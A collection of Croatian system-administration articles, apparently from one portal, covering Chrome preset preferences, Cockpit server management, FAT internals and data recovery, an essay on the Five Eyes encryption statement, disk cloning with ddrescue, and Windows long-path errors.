Za razliku od Mozille, u Chrome-u je dovoljno izmjeniti samo jednu datoteku koja se zove "master_preferences".

Naime, Chrome prilikom prvog pokretanja kreira datoteku "Preferences" u korisnikovom direktoriju (mapi). Radi se o tekstualnoj datoteci s JSON kodom (JavaScript Object Notation). Kako bi zaobišli kreiranje datoteke "Preferences" za svakog korisnika izmjenit ćemo datoteku "master_preferences" i kopirati u direktorij: /

C:\Program Files\Google\Chrome\Application\

U datoteku "master_preferences" upišemo sljedeće:

{
  "homepage": "http://161.53.XXX.YYY", 
  "homepage_is_newtabpage": false, 
  "browser": { 
    "show_home_button": true 
  }, 
  "bookmark_bar": { 
    "show_on_all_tabs": true 
  }, 
  "distribution": { 
    "skip_first_run_ui": true, 
    "import_search_engine": false, 
    "import_history": false, 
    "create_all_shortcuts": false, 
    "do_not_launch_chrome": true, 
    "make_chrome_default": false 
  }, 
  "first_run_tabs": [ 
    "http://161.53.XXX.YYY"
  ] 
}

Same opcije unutar datoteke su prilično jasne i prepoznatljive, te ih nije potrebno dodatno pojašnjavati.

Datoteku treba kopirati u gore spomenuti direktorij (možete napraviti "Replace" datoteke). Pokrećemo Chrome, i ako je sve dobro napravljeno, prilikom prvog pokretanja trebamo dobiti željenu web stranicu.

Pokrećemo Chrome, i ako je sve dobro napravljeno, prilikom prvog pokretanja trebamo dobiti željenu web stranicu.

pon, 2018-09-17 12:59 - Zdravko Rašić

Vijesti:

Windows

Kuharice:

Windows

Kategorije:

Vote:

No votes yet

story_tag:

pGina

chrome

firefox

sri, 2018-09-19 13:37 - Ratko Žižek

Pored brojnih prednosti, komandnolinijske edicije serverskih operativnih sustava imaju i jednu manu: potrebno je posvetiti im se, svakodnevno s njima raditi kako bi se stvarno iskoristili njihovi potencijali i efikasno se upravljalo serverima iz Bash ili Powershell ljuske. Nezgodno je što se danas više nego ikada od sistemaca očekuje aktivni angažman u brojnim drugim stručno-tehničkim temama i dilemama, pri čemu većina njih nimalo ne doprinosi unaprijeđenju vještine administriranja servera. Stoga su, iako ne mogu (niti trebaju) zamijeniti naredbeni redak, ipak dobrodošli GUI orijentirani server manageri poput Cockpita, prvenstveno zbog toga što se njihovom implementacijom poslovi nadgledanja servera i jednostavniji zahvati mogu delegirati djelatnicima help-deska, testerima i developerima kad rade u razvojnim i testnim okolinama. I sistemcima-žutokljuncima olakšati će, ili barem uljepšati, neke poslove.

Za Microsoftov Windows Admin Center zainteresirali smo se dok se još odazivao na ime Honolulu: https://sysportal.carnet.hr/node/1771, sad je na red došao Cockpit, Red Hatovo dijete. Zabavlja spoznaja koliko su ta dva besplatna alata slična i konceptualno i arhitekturalno, usporedite drugu sliku iz članka o MS-ovom alatu s nižom slikom!

U terminologiji open source projekta cockpit-project.org, iza kojeg stoji Red Hat, primarni Cockpit server je onaj kojemu pristupamo web preglednikom, on prihvaća HTTPS konekcije. Kako tipičan Linux server, recimo CentOS 7.x, pretvoriti u primarni Cockpit server? Praktično sve popularne serverske Linux distribucije imaju Cockpit u svojim službenim repozitorijima softverskih paketa, znači, maksimalno je olakšana ne samo instalacija nego i održavanje ovog alata tijekom njegovog životnog vijeka na serveru. Na CentOS ćemo Cockpit instalirati kako je prikazano nižom slikom, ali samo na primarnom serveru.

Ono što ne piše u instalacijskim uputama – očito su pisane s ciljem da čitatelja motiviraju za instalaciju Cockpita ;o) - jest sljedeće:

Gornjim postupkom smo na primarni Cockpit server instalirali (i omogućili) nekolicinu jezgrenih komponenti Cockpita, jedna od njih je cockpit-ws, servis koji na portu TCP 9090 čeka na HTTPS konekcije.

Što se tiče sekundarnih servera, na njima ćemo odraditi samo prvu točku uputa i uvjeriti se da sshd sluša na portu TCP 22. To je zato što nas Cockpit instanca na primarnom serveru usmjerava SSH konekcijom ka sekundarnim serverima (vidi prvu sliku), pri čemu gađa baš defaultni SSH port.

Kad se s računala, smartfona... spojimo na web konzolu primarnog Cockpit servera, nećemo odmah moći postaviti sekundarne servere na nadzornu ploču zbog jednostavnog razloga – nema je. Moramo ju instalirati, znači, samo na primarnom serveru zadajemo:

yum install cockpit-dashboard

Osvježimo Cockpitovo sučelje i dalje je lako, rabeći gumb + začas ćemo si složiti popis servera koje planiramo administrirati:

Instalacijom jezgre Cockpita dobijamo omanji broj alata, dodatne alate ugnježđujemo u Cockpit instaliranjem ekstenzija, recimo, za upravljanje diskovnim podsustavom servera instalirat ćemo cockpit-storaged, za upravljanje ažuriranjima tu je cockpit-packagekit, cockpit-docker je... znamo već. Uočite da ekstenzije instaliravamo na one servere na kojima ih želimo koristiti, nije rješenje sve to nabacati isključivo na primarni server.

Cockpit dopušta promjenu defaultnog TCP 9090 na kojem sluša njegov web serverčić, obično se ta mogućnost iskoristi kao jedna od “mina” kontra previše znatiželjnih likova. Mimo očekivanja, ne editira se cockpit.conf nego se ovako napravi:

* u /etc/systemd/system/ kreirati direktorij cockpit.socket.d

* u tom direktoriju kreirati datoteku listen.conf

* u tu datoteku upisati (i spremiti, dakako) tri retka teksta:

[Socket]

ListenStream=

ListenStream=9876 (ili neki drugi nezauzet visoki port)

* kao minimum, otvoriti na vatrozidu konekcije ka tom portu; vjerojatno ćemo morati rekonfigurirati i selinux podsustav ako radi u enforcing režimu.

Usput, ako imamo server s više pristupnih IP, u listen.conf datoteci možemo definirati adresu na kojoj će slušati cockpit-ws (defaultno sluša na svima), još jedna lako provediva mjera zaštite sustava. Što se tiče TLS certifikata kao preduvjeta za HTTPS konekcije, trenutkom prvog spajanja na njegovu web konzolu Cockpit će generirati samopotpisani certifikat i spremiti ga u /etc/cockpit/ws-certs.d. Spustimo li ovdje regularni TLS certifikat, bit će prihvaćen od Cockpita. Što se tiče konekcija i autentikacija na sekundarne servere, Cockpit se u cijelosti oslanja na SSH servis OS-a, jedini mu je zahtjev da SSH daemon sluša na portu TCP 22.

Slijedi mala pomoć adminima CentOS-a i Fedore: ekstenzija za krpanje OS-a neće raditi jer ju ometa Subscription Manager, taj sjeda u sustav tijekom inicijalne instalacije Cockpita. Ta rekosmo da je Cockpit Red Hatovo čedo ... :o). Kakogod, zadajte nižu naredbu i sve će biti ok:

rpm -e --nodeps subscription-manager

Cockpit se razvija s idejom da u svakom mogućem aspektu koristi funkcionalnosti OS-a domaćina. Tijekom instalacije, jezgra se povezuje sa sistemskim procesima i API-ima (systemd/DBus) te naša kliketanja u Cocpitovom nadasve ugodnom sučelju prevodi u iste one pozive kojima se služe uobičajene naredbe OS-a kad ih koristimo iz SSH ili konzolne sesije. Tijekom ulogiravanja u Cockpit, autentikaciju i autorizaciju odrađuje OS. To znači da će ulogirani korisnik biti identificiran od strane OS-a, potom će u sustavu imati iste dozvole kakve ima u standardnoj sesiji. Utoliko je isplativo uočiti opciju Reuse my password for privileged tasks koja nas čeka već na logon ekranu primarnog Cockpit servera. Opcija je ekvivalent sudo i pkexec naredbama, znači, ako ju uključimo prije ulogiravanja, Cockpit će proslijediti zaporku autorizacijskom podsustavu OS-a kad ovaj to zatraži. Naravno, opcija će djelovati samo za korisničke račune kojima je uistinu omogućeno eskaliranje privilegija unutar aktivne sesije, tipično, zahvatom administratora u sudoers.

Projekt hvali štedljiv odnos svog uratka prema resursima servera domaćina, nakon nekih testova i opažanja slažemo se s tim stavom. Pored spomenute modularnosti, čime nam je omogućeno instaliravanje samo onih funkcionalnosti koje su nam stvarno potrebne, treba pohvaliti i samoinicijativno deaktiviranje većine učitanih programskih modula nakon desetminutnog perioda neaktivnosti. Jasno, oni se brzo reaktiviraju kad dobiju signal od systemd procesa a ovaj, pak, reagira čim osjeti konekciju na Cockpitov port.

Tijekom perioda ovladavanja ovim GUI alatom, čovjek se ne može oteti dojmu da je uistinu riječ o vrlo kvalitetnom komadu softvera. Tek pomalo iritira prisutnost ekstenzije za primjenu sistemskih zakrpi - tko nije spreman tako važan posao odrađivati uporabom yum/rpm odn. apt/dpkg dueta, ne treba to raditi nikako - a izostanak bilo kakve mogućnosti manipuliranja direktorijima i datotekama, lokalnim ili dijeljenim. Ili je vaš autor postao zadrto mrzovoljno gunđalo...

Članak završavamo slikom tipične Cockpitove radne površine. Kad odlučite istražiti ponudu neke radne površine, klikećite ili tapkajte gdje god stignete jer puno je podataka ispod prikazanih stavaka.

Vijesti:

Kategorije:

Vote:

No votes yet

story_tag:

cockpit

server

FAT je prilično jednostavan datotečni sustav. U prošlom nastavku upoznali smo njegova ograničenja, koja nisu predstavljala problem dok su se koristili diskovi malog kapaciteta. Pratili smo kako se razvijao da bi mogao adresirati sve veće diskove. Na Windowsima ga je s vremenom zamijenio moćniji NTFS. Ali nakon toga FAT nije potiho nestao, već se preselio na mobilne i embedded uređaje. Vrijeme je da upoznamo unutarnju strukturu FAT filesystema.

Najbrže ćemo je prikazati ovom slikom:

Na počektu diska je boot sektor, čija je zadaća pokretanja OS-a. Boot sektor je tu bez obzira na to koji se operacijski sustav koristi. Ovog se časa nećemo baviti njime. Slijedi FAT tablica (File Alocation Table), koja sadrži popis klastera i njihov status, koji može imati jednu od četiri vrijednosti: zauzet (allocated), slobodan, kraj datoteke, loš klaster. Nakon FAT tablice smješten je root direktorij, koji sadrži popis datoteka i poddirektorija, njihov naziv plus početni klaster. Time završava sistemski dio diska i počinje podatkovni dio, na kojem su pohranjene datoteke.

Podsjetimo se: na disku se koristi sektor kao najmanja fizička jedinica za zapis podataka. Klaster je Microsoftov naziv za blok od više sektora, koji datotečni sustav koristi kao najmanju logičku jedinicu za zapis podataka. Klaster može imati veličinu od jednog (512 bajtova) do 128 sektora (65536 bajtova). Veličina klastera upisana je u boot sektoru. Ne smijemo smetnuti s uma da sektori unutar klastera uvijek slijede jedan za drugim, dakle klaster je neprekinut slijed zadanog broja sektora. I još jedna činjenica koju uvijek treba imati na umu: klasteri se koriste samo na podatkovnom dijelu diska, dok se u sistemskom dijelu računaju samo sektori!

Pogledajmo oznake za status klastera na FAT12:

0x000 (Free Cluster)
0x001 (Reserved Cluster)
0x002 - 0xFEF (Used cluster; value points to next cluster)
0xFF0 - 0xFF6 (Reserved values)
0xFF7 (Bad cluster)
0xFF8 - 0xFFF (Last cluster in file)

Na FAT16 verziji sve je na prvi pogled isto, samo se koristi više bitova, pa je iza 0x dodana još jedna nula:

0x0000 (Free Cluster)
0x0001 (Reserved Cluster)
0x0002 - 0xFFEF (Used cluster; value points to next cluster)
0xFFF0 - 0xFFF6 (Reserved values)
0xFFF7 (Bad cluster)
0xFFF8 - 0xFFFF (Last cluster in file)

Kad je u pitanju FAT32, stvari se, bar na prvi pogled, malo kompliciraju.

0x?0000000 (Free Cluster)
0x?0000001 (Reserved Cluster)
0x?0000002 - 0x?FFFFFEF (Used cluster; value points to next cluster)
0x?FFFFFF0 - 0x?FFFFFF6 (Reserved values)
0x?FFFFFF7 (Bad cluster)
0x?FFFFFF8 - 0x?FFFFFFF (Last cluster in file)

Čemu upitnici? Radi se o tome da se umjesto 32 bita koji su na raspolaganju koristi samo 28. Ne pitajte zašto, možda FAT28 ne zvuči binarno zaokruženo kao FAT16 i FAT32!? Upitnik iza 0x naprosto označava da tih 4 bita ne treba uzimati u obzir. U praksi, na tom mjestu možemo očekivati nule.

Ahilova peta takve organizacije podataka je u fiksnoj poziciji metapodataka: ako se područje diska koje zauzima FAT tablica na neki način ošteti, datoteke su još na disku, u podatkovnom dijelu, ali bez metapodataka korisnik ne može do njih. Rizik se umanjuje uvođenjem još jedne kopija FAT tablice, smještene odmah iza originalne. Tako na datotečnom sustavu FAT32 koristimo tablicu FAT1 i njenu kopiju FAT2.

Da ne bi sve bilo jednostavno, Microsoft dozvoljava da se isključi "FAT mirroring" i koristi samo jedna od dviju FAT tablica, ne nužno FAT1! Čemu takva komplikacija? Možda je to bio zahtjev korisnika FAT-a? Ili se radi tome da se koristi tablica koja nije oštećena? U svakom slučaju, pri hakiranju FAT32 treba biti spreman na to da će FAT1 u nekim slučajevima biti neaktivna, a FAT2 primarna tablica.

Kad bismo zadali naredbu za brisanje datoteke, namjerno ili slučajno, zapravo bismo samo promijenili prvi bajt naziva datoteke: preko njega se prepiše specijalni znak 0xE5 koji OS-u kaže da zanemari tu datoteku, a zatim se klasteri koje datoteka zauzima proglase slobodnim upisivanjem vrijednosti 0x0000 u FAT tablice. Podaci nisu nestali, samo im više ne možemo pristupiti s razine OS-a. Treba nam neki napredan alat s kojim možemo izravno pristupiti disku, kako bismo poništili brisanje. DOS je imao naredbu debug, elementarni editor diska, ali taj baš i nije bio jednostavan za korištenje, pa su se na tržištu prodavali programi drugih tvrki koji su mogli napraviti "undelete". Osamdesetih godina prošlog stoljeća najpoznatiji su bili Norton Utilites.

Peter Norton objavio je 1982. svoje alate za DOS, Norton Utilites, skup programa koji su DOS činili moćnijim. Bilo je tu svega i svačega: Beep bi izazvao pištanje zvučnika, što se dalo zgodno iskoristiti u batch programima, Clear bi izbrisao ekran, Reverse bi na tada crno bijelim ekranima zamijenio boje pozadine i teksa, Print bi ispisao datoteku (rane verzije DOS-a nisu imale tu naredbu). Ali već u toj prvoj verziji Nortonovih dodataka bili su alati za spašavanje datoteka s disketa, UnErase, FileFix. Kako su se s vremenom pojavljivale nove verzije DOS-a, Norton je nastavio razvijati svoje Utilities, pa je tako verzija 4,5 iz 1988. donijela Norton Disk Doctora i Disk editor. Mogli smo koristi i Nortonov alat UnErase, ali smo se radije pravili važnima editirajući izravno sadržaj direktorija i FAT tablice pomoću Disk editora.

Tvrtku Norton u međuvremenu je kupio Symantec, ali su zadržali ime Norton Utilites. Dodali su vlastite programe i nastavili razvijati alate za nove verzije Windowsa (do verzije Norton Utilites 16). Izdali su i verziju za Apple Macove.

S obzirom na to je FAT još uvijek u upotrebi, navedene tehnike spašavanja podataka još uvijek bi mogle zatrebati i mlađim kolegama.

Norton Utilites se još uvijek mogu kupiti, ali nas prvenstveno zanimaju programi otvorenog koda, pa smo se bacili u potragu za slobodnom verzijom Disk Editora. Nije nam dugo trebalo da pronađemo program zanimljivog naziva: Active@Disk Editor. Može se skinuti s adrese http://disk-editor.org i to kao .exe datoteka za Windowse ili .run za Linux. Ovaj je disk editor zaista napredan, ima ugrađene predloške za različite datotečne sustave i olakšava nam snalaženje na njima tako što iz izbornika možemo birati čemu želimo pristupti: u slučaju FAT-a boot sektoru, FAT1/FAT2 tablici, root direktoriju itd. Uz to nam pomaže u tumačenju značenja inače kriptičnih zapisa u obliku niza heksadecimalnih brojeva koji nisu "human friendly".

Active@Disk Editor poznaje i druge datotečne sustave: NTFS, exFAT, ext, XFS, ReFS itd. Dakle bit će nam koristan alat kojeg svakako treba dodati sistemčevu kompletu za preživljavanje. O tome kako se koristi i što se sve s njim može raditi nekom drugom prilikom.

ned, 2018-09-30 17:16 - Aco Dmitrović

Kategorije:

Vote:

No votes yet

story_tag:

FAT

datotečni sustav

Konzorcij obavještajnih službi pet država engleskog govornog područja, SAD, Ujedinjenog kraljevstva, Kanade, Australije i Novog Zelanda, zanimljivog naziva Five Eyes, donio je zajednički dokument pod nazivom "Statement of Principles on Access to Evidence and Encryption". Po naslovu bi se reklo da ih muči enkripcija na Internetu jer ometa prikupljanje dokaza. Evo nekoliko naglasaka iz tog zanimljivog dokumenta koji nudi teze o kojima treba razmisliti.

Enkripciju koja se koristi radi zaštite osobnih, poslovnih i vladinih informacija također koriste i kriminalci i teroristi, kako bi izbjegli otkrivanje, onemogućili istrage i izbjegli sudske procese.

Ako se prisjetimo samih početaka Interneta, tada je vlada SAD nastojala spriječiti izvoz tehnologije za enkripciju i ograničiti veličinu SSL ključeva na 48 bita. Jer su takvu enkripciju mogli razbiti s tadašnjim računalima?

I sada slijedi zanimljiv naglasak: "Zakoni koji štite privatnost moraju spriječiti proizvoljno i nezakonito uplitanje, ali privatnost nije apsolutna. Tijela državne vlasti trebaju imati mogućnost pristupiti privatnim podacima kada im sud ili nazavisno tijelo to odobri u skladu s prihvaćenim zakonskim standardima. Baš kao što se po istim principima dozvoljava pretres stana, automobila i osobnih stvari."

Dakle privatnost nije apsolutna! Možda ni ljudska prava nisu apsolutna? Kamo će nas odvesti ovakva relativizacija vrijednosti koje smatramo temeljem demokratskih društava? Implicira se da kriminalci i teroristi krše pravila, pa za njih ta prava više ne vrijede. Ali što je s lojalnim građanima, čija je privatnost također ugrožena u tehnološki naprednom svijetu? Jesu li oni samo kolateralne žrtve?

Spomenuti dokument govori o pristupanju osobnim podacima ukoliko je to opravdano i potrebno za "nacionalnu sigurnost". Dozvoljeno je kršenje pravila ako to dopusti sud ili neki neki nezavisan "authority". Tu se misli na obavještajne agencije. Radi brzine kojom se stvari danas odvijaju, možda i ne treba čekati sudski nalog? U kolijevci demokracije možda postoje agencije koje su nezavisne, ali iz našeg domaćeg iskustva ovakve izjave izazivaju podsmijeh. Uz političko kadroviranje i obavještajno podzemlje podložno utjecaju moćnika iz sjene, gdje je tu nezavisnost i briga za dobrobit građana? Tko si tu uzima za pravo da procjenjuje kad je narušavanje privatnosti zakonito, a kad nezakonito? Da li im sama činjenica da su državna tijela daje monopol na ispravnost odluka i imunitet za kršenje zakona? Kod nas trenutno pratimo "aferu SMS", ali smo istovremeno svjedočili ispadu američkog predsjednika koji ne priznaje da međunardni sud ima ovlasti nad američkom vojskom. Nećete suditi našim vojnicima za ratne zločine! Možete suditi Afrikancima i Balkancima! Reklo bi se da su jedino važni interesi i vojno-ekonomska moć onih koji odlučuju što je dozvoljeno a što nije.

Našim osobnim podacima raspolažu i komercijalne tvrtke, ali to nije tema ove priče. Ipak su autori spomenutog dokumenta obavještajci. Odgovor takvom pristupu dao je Bruce Schneier u svojoj knjizi "Klikni ovdje da bi pobio sve". Ne treba dozvoliti obavještajnoj zajednici da sama predlaže zakone koji se tiču svih nas. Oni kao da ne razumiju prirodu tehnike. Nije moguće učiniti sigurnim američke mreže a sve ostale ostaviti ranjivima za nadzor i napade. Tehnologija tako ne funkcionira. Ako poboljšamo sigurnost "naše" opreme, htjeli ili ne htjeli poboljšali smo i sigurnost "njihove". Ako želimo da njihove mreže budu otvorene za nadzor, ostavit ćemo ranjivima i naše. Treba donijeti načelnu odluku, kaže Schneier, da je obrana važnija od napada. Schneier ne vjeruje da će se time onemogućiti prikupljanje dokaza protiv kriminalaca i terorista. Kao tehnološki razvijena zemlja, SAD može više izgubiti radi ranjivosti Interneta nego njezini protivnici. Isto tako, dobrobit od sigurnog Interneta je daleko veća od dobrobiti koju može donijeti nesiguran Internet. Tu se misli na uspjeh poslovanja i uspjeh demokratskih politika.

Čovjek je političko biće, zoon politikon. Oduvijek se udružuje u plemena, navijačke klubove, nacije, rase, religije... Svijet se od zore čovječanstva dijeli na "nas" i "njih". Mi smo, naravno, dobri dečki i uvijek u pravu. Oni su ovakvi ili onakvi, opasni su jer su drugačiji. Tu se krije bit ove i svih sličnih rasprava. Hoće li čovječanstvo uspjeti donijeti pravila koja su univerzalna, vrijede za sve homo sapiense na planeti, ili ćemo se i dalje rukovoditi parcijalnim interesima, donositi pravila koja se selektivno primjenjuju i mogu se kršiti kad nam je to u intresu. Internet je učinio velik korak prema univerzalizmu, ali svijetom još uvijek vladaju parcijalni interesi. Dapače, Internet treba iskoristiti da "naši" povećaju svoj utjecaj i bogatstvo.

Pitao sam domaće trgovce da li je otkriće ranjovosti Intelovih i AMD-ovih procesora smanjilo prodaju računala? Nije! Potražnja je tolika da s dolaskom novih modela procesora cijene starijih ne padaju značajno. Očigledno, više ne možemo bez Interneta, pa koliko košta da košta. Ne mislim tu samo na cijenu računala. Bit će da sam ja jedini koji je odlučio odgoditi nabavu novog računala dok ne pronađem neku spravu koja nije napravljena zato da bi me se s lakoćom pratilo. Zanimljiv je bio komentar jednog trgovca na moje raspitivanje. Ionako Microsoft prati svaki naš klik, zna kako i zašto koristimo računalo. To im, kao, omogućuje da ga bolje prilagode našim potrebama. Da ne bi! Kad sam mu odgovorio da zato ne koristim Windowse, nego Linux, imao je spreman odgovor. Ne preporučuje mi Linux, to je riskantno jer previše ljudi sudjeluje u razvoju. Oni mi, kao Microsoftov partner, ne mogu pomoći ako s Linuxom budem imao problema. Ako ipak želim Linux, onda neka odaberem distribuciju poput RedHata, jer ta tvrtka plaća Microsoftu korištenje patenata i podršku. Očito je prošao obuku za Microsoft partnera. Nasmijao sam se, obećao da ću rješavati probleme s Linuxom bez njihove pomoći.

Nedavno je objavljena vijest da je dostupan Risc V, procesor napravljen po otvorenim standardima, bez nedokumentiranih naredbi. Po BSD licenci. Zasad je to još skupa igračka, verzija za developere, ali u budućnosti možemo očekivati jeftinije, masovno proizvedene procesore i matične ploče, sposobne podržavati LInux.

Naučili smo da je privatnost relativna, da su ljudska prava relativna, pa moramo shvatiti i da je demokracija relativna i nesavršena. Njena je najveća mana u tome što ne funkcionira ako svatko od nas ne uključi mozak i ne zasuče rukave. Sve dok drugima prepuštamo da brinu o nama, morat ćemo uvijek nanovo otkrivati da se ti drugi prvo pobrinu za sebe. Zato bi trebalo podržati onu manjinu koja radi nešto što je u općem interesu.

Danas je situacija na Internetu takva da većinu našeg bandwidtha, koji plaćamo telekomima, troše reklame. Tekst stranice koji želimo pročitati okružen je agresivnim reklamama, slikama koje trepere, spotovima. U zadnje vrijeme reklame čak prekrivaju dio teksta koji se ne može pročitati. Ako kliknemo na X, reklama se ne zatvara, samo se umjesto nje pojavljuje druga. Te su reklame izabrane tako što nas profiliraju, znaju svaki naš klik. Kad me susjed zamolio da mu nešto potražim na Internetu, još su me mjesecima zatrpavati brojnim ponudama srodnih proizvoda. Otvorio sam, radoznalosti radi, profil na Facebooku, ponešto objavio. Brzo su me strpali u ladice, pa me bez pitanja uključuju u razne grupe koje propagiraju nešto što me zapravo ne zanima. Nude mi da podržim političke programe koji će tobože ispraviti društvene nepravde. Očito je da me nisu dobro profilirali, jer nisu shvatili da sam razvio imunitet na njihove marketinške igre.

Kad bi mi netko ponudio skuplji pristup Internetu, uz uvjet da ne dobijam reklame, odmah bi pristao. Do tada, zatrpavat će me praznim obećanjima i lažnim vijestima, nastojeći me uvući u svoje interesne sfere.

sub, 2018-10-13 20:41 - Aco Dmitrović

Kategorije:

Vote:

Vaša ocjena: NemaAverage: 5(1 vote)

story_tag:

sigurnost

privatnost

uto, 2018-10-23 10:19 - Goran Šljivić

Hard Drive Icon Godine rada i vrtnje na tvrdim diskovima ostavljaju posljedice koje u jednom trenutku počnu dolaziti do izražaja. U ovom našem primjeru računalo staro nekih 10 godina je postalo vrlo usporeno i korisnik se žalio da ga ometa u radu. Pri ponovnom pokušaju logiranja u Windows 7 sustav, sustav nas upozorava da ima problema s lošim sektorima (bad sectors). To je obično upozorenje na koje se mora reagirati što prije, jer postoji opasnost da disk možda neće doživjeti sljedeće startanje, naročito zbog toga što se korisnik već određeno vrijeme susreće s ovim problemom. Podižemo Linux live sistem te Gparted alatom također dobivamo informaciju da disk ima loše sektore.

Nismo se željeli baviti istraživanjem o mogućnosti oporavka diska, izolacijom loših sektora ili nekim drugim metodama, nego ćemo pokušati što prije "klonirati" sadržaj na drugi disk. Disku starom 10 godina je ionako došlo vrijeme zamjene. Korisnik ima rezervnu kopiju podataka s oštećenog diska i samo ga zanima da što prije dobije funkcionalno računalo. Nekakav snapshot sistemske particije napravljen Clonezilla alatom iz 2015. godine imamo spremljen, ali do 2018 na sustavu se vjerovatno štošta promijenilo. Imamo ideju da pokušamo isklonirati cjelokupni oštećeni disk na drugi disk te tako izbjegnemo ponovnu instalaciju softvera, zakrpa, povratak korisničkih podatka i drugog na stanje iz 2015.

Sada treba odabrati najoptimalniju metodu kloniranja da nam ne uzme previše vremena pošto se radi o oštećenom disku kojeg ne možemo klonirati već nekim provjerenim metodama korištenim na ispravnim diskovima.

Često smo koristili Clonezilla live alat Clonezilla – prebacivanje preslike na hardverski drugačiji poslužitelj za namjenu prebacivanja sistema s jednog diska na drugi. Po nekim prethodnim iskustvima na Clonezilla forumu, postoji expert način rada u kojem postoji -rescue opcija. Po komentarima opcija nije davala baš uvijek najbolje rezultate, ponekad je predugo trajalo ili su se pak javljale greške. Generalno, preporuka je korištenje alata ddrescue ili gddrescue o kojima smo pisali na portalu sistemac . U navedenom članku korišten je oblik naredbe disk to image u svrhu spašavanja podataka. Naša ideja je da radimo disk to disk metodom da operativni sistem uz korisničke podatke prebacimo što prije, pošto nemamo rizika gubitka. Ukoliko metoda disk to disk ne prođe, nemamo izbora nego ćemo morati ići s provjerenim snapshotom snimljenom 2015. godine.

Prema pisanjima korisnika, često preporučenu opciju –rN je bolje ne koristiti zbog mnogih loših iskustava u isforsiranom pokušavanju čitanja oštećenih dijelova koji su činili još veću štetu i trajali dugo vremena. Opcija -f, --force i -n, --no-scrape obećavaju dobar rezultat.

--force prebrisava particije ili mogući sadržaj na odredišnom disku bez pitanja dok --no-scrape sprječava trošenje previše vremena u pokušajima da se oporave teže oštećena područja ili datoteke. U našem slučaju se traži što efikasnije prebacivanja datotečnog sustava na ispravan disk.

Za pokretanje ddrescue alata smo odabrali minijaturnu Debian Live distribuciju Slax pokretanu sa USB sticka. Na računalo smo priključili ispravan disk na kojeg prebacujemo sadržaj sa oštećenog diska. Odabrana naredba je:

#ddrescue -f -n /dev/sdb /dev/sda /root/log1.log

Prethodno smo fdisk -l naredbom dobro provjerili da je :

sdb    "loš" disk   320 GB

sda    "dobar" disk 500 GB

log1    log zapis, za svaki slučaj

Kao što se vidi u log zapisu nakon cca 3 sata ddrescue naredba je uspješno završila do kraja. Gasimo računalo i isključujemo 320 GB oštećeni disk, stavljamo noviji 500 GB disk i startamo računalo. Sistem se starta bez problema, čak se čini da su svi korisnički podatci preživjeli transfer na novo odredište. S alatom gparted provjeramo stanje particija, sve se čini u redu, a ostaje nam još neraspoređenog mjesta. Ovaj prostor možemo pretvoriti u EXT4 particiju na koju možemo spremati buduće Clonezilla sessione. Tako spremljene ispravne rezervne kopije NTFS sistemske sda2 particije mogu poslužiti za za ponovni budući oporavak sistema, ukoliko bude potreban.

Za svaki slučaj također možete pokrenuti CHKDSK iz Windows nad particijom C: da popravi eventualne dodatne greške prekopirane s oštećenog diska.

Uspješno smo priveli slučaj kraju, nekad se isplati eksperimentrirati s nepoznatim metodama, pa ćemo u budućnosti imati optimalan put za rješavanje ovog tipa problema.

Kuharice:

Kategorije:

sys.kuharica

Vote:

No votes yet

story_tag:

Windows Logo Greška "Destination Path Too Long", za koju ste mislili da je davno ispravljena, opet se pojavila kada ste pokušali kopirati datoteke i mape korisnika u Windows 10 operacijskom sustavu. Razlog je Windows Explorer koji nije u mogućnosti izvršiti operaciju kopiranja ili preimenovanja ako putanja (path) u svom nazivu ima 260 i više znakova. Ova mogućnost nije uključena po defaultu, jer se željelo zadržati kompatibilnost sa starijim datotečnim sustavima.

U našem konkretnom slučaju, dokumenata i mapa koji su u svom nazivu ili putanji imali 260 i više znakova bilo je jako puno. Trikovi poput kreiranje prečice u ovom slučaju nisu pomogli.

Microsoft je od verzije Windows-a 1607 omogućio isključivanje ovog ograničenja, pa smo probali riješiti problem na predloženi način. No, prije nego što napravimo ovu operaciju nad stvarnim datotekama, napravit ćemo test na nekoliko dugačkih putanja s datotekama, koje ćemo kasnije pokušati kopirati u mapu "Documents".

Na particiji D:\ u mapi "KopijeDokumenata" kreirat ćemo niz mapa naziva "Dokument1" i u zadnoj mapi datoteku "pppppp.txt"što zajedno s glavnom mapom "KopijeDokumenta"čini ukupno 262 znaka u putanju.

D:\KopijeDokumenata>mkdir
mape\Dokument1\Dokument1\Dokument1\Dokument1\Dokument1\Dokument1\Dokument1\Dokument1\Dokument1\
Dokument1\Dokument1\Dokument1\Dokument1\Dokument1\Dokument1\Dokument1\Dokument1\Dokument1\Dokument1\
Dokument1\Dokument1\Dokument1\Dokument1

Iskoristimo naredbeni redak i s CD promijenimo putanju do našeg zadnjeg direktorija:

D:\KopijeDokumenata>cd
mape\Dokument1\Dokument1\Dokument1\Dokument1\Dokument1\Dokument1\Dokument1\Dokument1\Dokument1\
Dokument1\Dokument1\Dokument1\Dokument1\Dokument1\Dokument1\Dokument1\Dokument1\Dokument1\Dokument1\
Dokument1\Dokument1\Dokument1\Dokument1

U zadnjem direktoriju kreiramo praznu datoteku "pppppp.txt"

copy NUL pppppp.txt

Nakon pripreme mapa i datoteke pokrenimo gpedit.msc (Group Policy Editor), gdje ćemo uključiti podršku za kopiranje dugačkih staza.

Putanja koju moramo odabrati je sljedeća:

Computer Configuration-->>Administrative
Tempaltes-->>System-->>FileSystem-->Enable Win32 long paths

Nakon što potvrdimo "Enable Win32 long paths" dobijemo novi prozor u kojem uključimo opciju "Enable". Nakon podešavanja ove opcije resetirajmo računalo.

Trenutak istine... pokušat ćemo kopirati naše mape koje smo prethodno pripremili za testiranje, no prilikom testiranja opet dobijamo poruku "Destination Path Too Long":

Nažalost, iz prikazanog se može vidjeti da ovaj Group Policy ne radi i ograničenje od 260 znakova je još prisutno. Mi smo završili s napola kopiranom mapom, pa sada ni ne znamo što se točno iskopiralo, a što nije.

Kako ćemo najbezbolnije riješiti ovaj problem? Velikih problema neće biti ako se radi o samo jednoj putanji koja prelazi 260 znakova. Možemo ručno pronaći tu datoteku ili mapu i prebaciti je na odgovarajuće mjesto, jer nam to neće oduzeti puno vremena.

No, što u slučaju da takvih putanja ima puno, pa nam sada glavobolju stvara činjenica da smo završili u situaciji da ne znamo sa sigurnošću koliko se podataka iskopiralo na drugu lokaciju?

Najbolje je u tom slučaju provjeriti koliko na računalu uopće ima dugačkih putanja koje prelaze 260 znakova, a možete (za svaki slučaj) potražiti i putanje s 250 i više znakova.

Za tu svrhu koristit ćemo vrlo jednostavnu naredbu iz naredbenog retka:

D:\>dir /s /b | sort /r /+250 /o popis.txt

/s - prikaz datoteka i podmapa
/b - prikaz bez zbirnih informacija
| - preusmjeravanje
sort - sortiranje
